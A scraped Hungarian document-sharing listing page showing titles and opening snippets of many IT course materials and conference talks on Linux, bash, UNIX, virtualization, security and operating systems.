Gyakorla( útmutató és demonstrációk a SZTAKI Felhő használatához 2013.04.17 Gergely Márk Párhuzamos és ElosztoL Rendszerek Kutatólaboratórium gergely.mark@sztaki.mta.hu ÁLekintés Felhasználóknak: Belépés
RészletesebbenBevezetés az informatikába, második gyakorlat. Bevezetés Környezetváltozók és néhány egyszerű utasítás Jogosultságok Fájlkezelés
Bevezetés az informatikába, második gyakorlat Bevezetés Környezetváltozók és néhány egyszerű utasítás Jogosultságok Fájlkezelés Bevezetés Parancsértelmező (bash) Utasítások man Szövegszerkesztők Bash Különféle
Részletesebben2016/06/09 13:15 1/108 Linux parancssor
2016/06/09 13:15 1/108 Linux parancssor < Linux Linux parancssor Szerző: Sallai András Copyright Sallai András, 2009, 2010, 2011, 2012, 2013, 2014, 2015 Licenc: GNU Free Documentation License 1.3 Web:
RészletesebbenGyors tippek linuxra
Gyors tippek linuxra Linux az oktatásban rendezvénysorozat előadó: Rózsár Gábor http://lok.ini.hu 2004. április 23. Mit adhat ez az előadás? Mint a címe is jelzi gyors és talán hasznos tippeket adhat olyan
Részletesebbenes tanév őszi félév Tantárgyi követelményrendszer és programleírás
I. Követelményrendszer 1. Tantárgynév, kód, kredit, választhatóság: Operációs rendszerek, MAI3A8IN, 5 kredit, kötelező 2. Felelős tanszékszakcsoport: Automatizálási és Alkalmazott Informatikai szakcsoport
RészletesebbenLinux alapok és használatuk
1,2 1 Orvosi Laboratóriumi és Képalkotó Diagnosztikai Tanszék Debreceni Egyetem 2 Nukleáris Medicina Intézet Debreceni Egyetem AOLINUX12, 1 kredit Tartalom Előadás 1 Előadás Népszerű alkalmazások bemutatása:
RészletesebbenOperációs rendszerek. Folyamatok kezelése a UNIX-ban
Operációs rendszerek Folyamatok kezelése a UNIX-ban Folyamatok a UNIX-ban A folyamat: multiprogramozott operációs rendszer alapfogalma - absztrakt fogalom. A gyakorlati kép: egy program végrehajtása és
RészletesebbenLINUX PMB2506-1 VIRTUALBOX TÖRTÉNELEM DEBIAN ALAPPARANCSOK - GRUB
LINUX PMB2506-1 VIRTUALBOX TÖRTÉNELEM DEBIAN ALAPPARANCSOK - GRUB VIRTUÁLIS GÉP FÁJL LETÖLTÉSE http://zeus.nyf.hu/~shaggy/lin2014/debian-7-pmb2506.ova UNIX UNIX (1969-1972) tervezői: Ken Thompson, Dennis
RészletesebbenVIRTUALIZÁCIÓ KÉSZÍTETTE: NAGY ZOLTÁN MÁRK EHA: NAZKABF.SZE I. ÉVES PROGRAMTERVEZŐ-INFORMATIKUS, BSC
VIRTUALIZÁCIÓ KÉSZÍTETTE: NAGY ZOLTÁN MÁRK EHA: NAZKABF.SZE I. ÉVES PROGRAMTERVEZŐ-INFORMATIKUS, BSC A man should look for what is, and not for what he thinks should be. Albert Einstein A számítógépek
RészletesebbenLegfontosabb tulajdonságai. UNIX rendszer felhasználói és fejlesztői felülete (1-4. ea.) Unix hagymahéj struktúrája. Legfontosabb tulajdonságai
UNIX rendszer felhasználói és fejlesztői felülete (1-4. ea.) Szeberényi Imre BME IIT Legfontosabb tulajdonságai többfelhasználós (multiuser) időosztásos (time sharing) hardware független
Részletesebben2011 PCI Community Meeting Újdonságok Tassi Miklós Gáspár Csaba
2011 PCI Community Meeting Újdonságok Tassi Miklós Gáspár Csaba 2011. december 7. Napirend Mi az a PCI Community Meeting? Fontosabb események Új ajánlások o P2PE o EMV o Virtualizáció o Tokenizálás o Vezeték
RészletesebbenÁllásidő minimalizálása: BTRFS, kgraft
Állásidő minimalizálása: BTRFS, kgraft SUSE Expert Days Kovács Lajos Vezető konzultáns kovacs.lajos@npsh.hu 100 0 % SUSE Linux Enterprise 12 célok 100 0 % Állásidő csökkentése 2 Hatékonyabb üzemeltetés
RészletesebbenHálózati operációs rendszerek II. Novell Netware 5.1 Szerver
Hálózati operációs rendszerek II. Novell Netware 5.1 Szerver 1 Netware 5 főbb jellemzői (címszavakban) Intel Pentium CPU-n fut Felügyeli és vezérli a különböz ő alrendsze- reket és az azok közötti kommunikációt
RészletesebbenHiperkonvergens infrastruktúra. Brenner Zoltán rendszermérnök
Hiperkonvergens infrastruktúra Brenner Zoltán rendszermérnök Bevezetés Hyperconverged Infrastructure Software Defined Software Defined Datacenter HyperScale Enterprise Server SAN A hiperkonvergens inftrastruktúra,
RészletesebbenVodafone ODI ETL eszközzel töltött adattárház Disaster Recovery megoldása. Rákosi Péter és Lányi Árpád
Vodafone ODI ETL eszközzel töltött adattárház Disaster Recovery megoldása Rákosi Péter és Lányi Árpád Adattárház korábbi üzemeltetési jellemzői Online szolgáltatásokat nem szolgált ki, klasszikus elemzésre
RészletesebbenOperációs rendszerek. 4. gyakorlat. BASH bevezetés, script írása, futtatása UNIVERSITAS SCIENTIARUM SZEGEDIENSIS UNIVERSITY OF SZEGED
UNIVERSITAS SCIENTIARUM SZEGEDIENSIS UNIVERSITY OF SZEGED BASH bevezetés, script írása, futtatása Operációs rendszerek 4. gyakorlat Szegedi Tudományegyetem Természettudományi és Informatikai Kar Csuvik
RészletesebbenKiszolgálók üzemeltetése FTP. Iványi Péter
Kiszolgálók üzemeltetése FTP Iványi Péter FTP File Transfer Protocol Abhay Bhushan, RFC 114, 1971 RFC 765, 1980 RFC 959, 1985 File-ok fel- és letöltése egy szerverről Két port-ot használ, out-of-band (sávon
RészletesebbenOperációs rendszerek gyakorlat
01 Operációs rendszerek gyakorlat Berta Árpád berta@inf.u-szeged.hu www.inf.u-szeged.hu/~berta Irinyi magasföldszint, Mesterséges Intelligencia kutatócsoport, 45/A szoba Fogadó óra: hétfő 15:00-16:00-ig
RészletesebbenBudapesti Műszaki és Gazdaságtudományi Egyetem Villamosmérnöki és Informatikai Kar. Virtualizációs technológiák és alkalmazásaik BMEVIMIAV89
Budapesti Műszaki és Gazdaságtudományi Egyetem Villamosmérnöki és Informatikai Kar Virtualizációs technológiák és alkalmazásaik BMEVIMIAV89 KVM Menedzsment felületek Mészáros Gábor 2012. december 11. 1
RészletesebbenSzkriptnyelvek. 1. UNIX shell
Szkriptnyelvek 1. UNIX shell Szkriptek futtatása Parancsértelmez ő shell script neve paraméterek shell script neve paraméterek Ebben az esetben a szkript tartalmazza a parancsértelmezőt: #!/bin/bash Szkriptek
RészletesebbenJavaScript bűvésztrükkök, avagy PDF olvasó és böngésző hackelés
JavaScript bűvésztrükkök, avagy PDF olvasó és böngésző hackelés Bemutatkozás Molnár Gábor Ukatemi Technologies IT biztonsági szakértő gmolnar@ukatemi.com Áttekintés JavaScript Firefox JS sebezhetőség Adober
RészletesebbenFájlrendszer-címkézés a SELinuxban
Fájlrendszer-címkézés a SELinuxban A SELinux sokkal kifinomultabban vezéreli a fájlokhoz való hozzáférést. Lássuk! Most, hogy az NSA Security Enhanced Linux (Fokozott Biztonságú Linux) része lett a 2.6-os
Részletesebben4. Laborgyakorlat. A fájlokról ezeket az adatokat, a fájlrendszer tárolja. Számunkra az 1, 3, 4. oszlopok lesznek az érdekesek.
Linux fájlrendszerek. 4. Laborgyakorlat Előző gyakorlaton, már volt szó a fájlrendszerekről, mikor a mount parancs -t kapcsolójáról volt szó. Linux alatt, az egyes fájlokhoz való hozzáférések miatt, a
RészletesebbenOperációs rendszerek. A Windows NT felépítése
Operációs rendszerek A Windows NT felépítése A Windows NT 1996: NT 4.0. Felépítésében is új operációs rendszer: New Technology (NT). 32-bites Windows-os rendszerek felváltása. Windows 2000: NT alapú. Operációs
RészletesebbenOperációs rendszerek Memóriakezelés 1.1
Operációs rendszerek Memóriakezelés 1.1 Pere László (pipas@linux.pte.hu) PÉCSI TUDOMÁNYEGYETEM TERMÉSZETTUDOMÁNYI KAR INFORMATIKA ÉS ÁLTALÁNOS TECHNIKA TANSZÉK Operációs rendszerek p. A memóriakezelő A
RészletesebbenSQLServer. SQLServer konfigurációk
SQLServer 2. téma DBMS installáció SQLServer konfigurációk 1 SQLServer konfigurációk SQLServer konfigurációk Enterprise Edition Standart Edition Workgroup Edition Developer Edition Express Edition 2 Enterprise
RészletesebbenAlkalmazás és megjelenítés virtualizáció
Virtualizációs technológiák és alkalmazásaik Alkalmazás és megjelenítés virtualizáció Micskei Zoltán http://www.mit.bme.hu/~micskeiz Budapesti Műszaki és Gazdaságtudományi Egyetem Méréstechnika és Információs
RészletesebbenUtolsó módosítás:
Utolsó módosítás:2010. 09. 15. 1 2 Kicsit konkrétabban: az utasítás hatására a belső regiszterek valamelyikének értékét módosítja, felhasználva regiszter értékeket és/vagy kívülről betöltött adatot. A
Részletesebben1. Használatba vétel. 1.1 Biztonsági előírások. 1.2 Rendszerkövetelmények. 1.3 A csomag tartalma
1. Használatba vétel 1.1 Biztonsági előírások Kérjük, hogy mielőtt használatba venné a Prestigio Data Racer I készüléket, olvasson el minden biztonsági figyelmeztetést. A használati utasításban ismertetett
RészletesebbenOperációs rendszerek 2 3. alkalom - Reguláris kifejezések, grep, sed. Windisch Gergely windisch.gergely@nik.uni-obuda.hu 2010-2011 2.
Operációs rendszerek 2 3. alkalom - Reguláris kifejezések, grep, sed Windisch Gergely windisch.gergely@nik.uni-obuda.hu 2010-2011 2. félév Reguláris kifejezések Reguláris kifejezésekkel lehet keresni egy
RészletesebbenNetworkshop 2013 (március ) 1.
Networkshop 2013 (március 26-28.) 1. A UNIX rendszerek biztonsági modellje kezdetben - A root (0-ás UID-ű) processzek korlátozás nélkül dolgozhatnak a kernel rendszerhívásaival - Minden más processz korlátozott
RészletesebbenVirtualBox, Debian telepítés
VirtualBox, Debian telepítés 1 VirtualBox Az Oracle VirtualBox egy x86-alapú (azaz AMD vagy Intel rendszerekre kifejlesztett), több platformon is futtatható virtualizációs program. A segítségével virtuális
RészletesebbenOperációs rendszerek. Bemutatkozás
Bevezetés az operációs rendszerek világába dr. Benyó Balázs benyo@sze.hu Bemutatkozás www.sze.hu/~benyo 1 Számítógép HW-SW felépítése felhasználó felhasználó felhasználó Operációs rendszer Operációs rendszer
RészletesebbenLinux alapok gyakorlat
11. évfolyam, informatikai rendszerüzemeltető 2018. Témakörök (elméleti tárgyrész) 1. Kialakulása 2. Disztribúciók 3. Telepítés, bootloader 4. Csomagkezelés 5. Rendszer felépítése, kernel (könyvtárak,
Részletesebben